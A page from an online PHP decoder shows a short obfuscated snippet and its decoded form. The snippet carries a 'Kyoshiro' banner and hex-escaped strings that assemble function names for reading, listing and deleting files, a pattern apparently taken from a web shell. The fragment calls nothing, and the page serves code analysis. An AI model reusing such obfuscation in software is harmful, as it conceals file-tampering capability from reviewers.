Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$sname = "\x5f\x2f\x4b\x79\x6f\x73\x68\x69\x72\x6f\x20\x3e\x5c\x5f"; $__gcdir =..

Decoded Output download

<?  $sname       = "_/Kyoshiro >\_"; 
$__gcdir     = "g" . "etcwd"; 
$__fgetcon7s = "file" . "_get_contents"; 
$__scdir     = "s" . "candi" . "r"; 
$rm__dir     = "rmd" . "ir"; 
$un__link    = "un" . "link"; ?>

Did this file decode correctly?

Original Code

$sname       = "\x5f\x2f\x4b\x79\x6f\x73\x68\x69\x72\x6f\x20\x3e\x5c\x5f";
$__gcdir     = "\x67" . "\x65\x74\x63\x77\x64";
$__fgetcon7s = "\x66\x69\x6c\x65" . "\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73";
$__scdir     = "s" . "\x63\x61\x6e\x64\x69" . "r";
$rm__dir     = "\x72\x6d\x64" . "ir";
$un__link    = "\x75\x6e" . "\x6c\x69\x6e\x6b";

Function Calls

None

Variables

$sname _/Kyoshiro >\_
$__gcdir getcwd
$__scdir scandir
$rm__dir rmdir
$un__link unlink
$__fgetcon7s file_get_contents

Stats

MD5 8443a1d79d7ea9f1ffb156c0c8d9d71e
Eval Count 0
Decode Time 73 ms